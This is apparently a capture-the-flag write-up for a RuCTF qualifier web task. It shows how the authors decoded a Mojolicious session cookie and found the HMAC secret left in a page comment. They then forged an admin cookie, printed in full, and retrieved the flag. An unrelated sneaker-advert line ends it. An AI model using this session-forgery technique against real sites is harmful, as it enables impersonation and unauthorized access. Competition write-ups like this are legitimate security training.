There is service raised at http://w2.quals.ructf.org/.
There is the authorization form and another form with strange functional on page. Also there is registration link.
At first we registered a new user with 1 / 1 as login / password. We saw that server set cookie:
Cookie: mojolicious=eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9--b844d3ef12af172ffebe4271f93d0548b92f637d
First part before "--" is base64-encoded user session information:
'eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9' == base64('{"name":"1","expires":1395062798}')Second part after "--" is hash_hmac with sha1 of first part with a secret. We found secret in page source code:
<!-- secret: ructf -->
So we assumed that we need got admin's cookie. We replaced our nickname to 'admin' and generated new cookie with help of http://www.freeformatter.com/hmac-generator.html:
part1 = base64('{"name":"admin","expires":1395062798}')
part2 = hash_hmac('sha1', part1, 'ructf')Result:
part1 + '--' + part2 == 'eyJuYW1lIjoiYWRtaW4iLCJleHBpcmVzIjoxMzk1MDYyNzk4fQ==--f0b9d2795f0e8de1abafede4ea2aae54282e09a9'
So we logged in with new admin cookie and saw a message 'Hi, admin!'. Then we went to http://w2.quals.ructf.org/list and got flag 054ad7a734437d6853383ad919526dc5 by following http://w2.quals.ructf.org/very/super/secret/flag link.
Asics footwear | Air Jordan Sneakers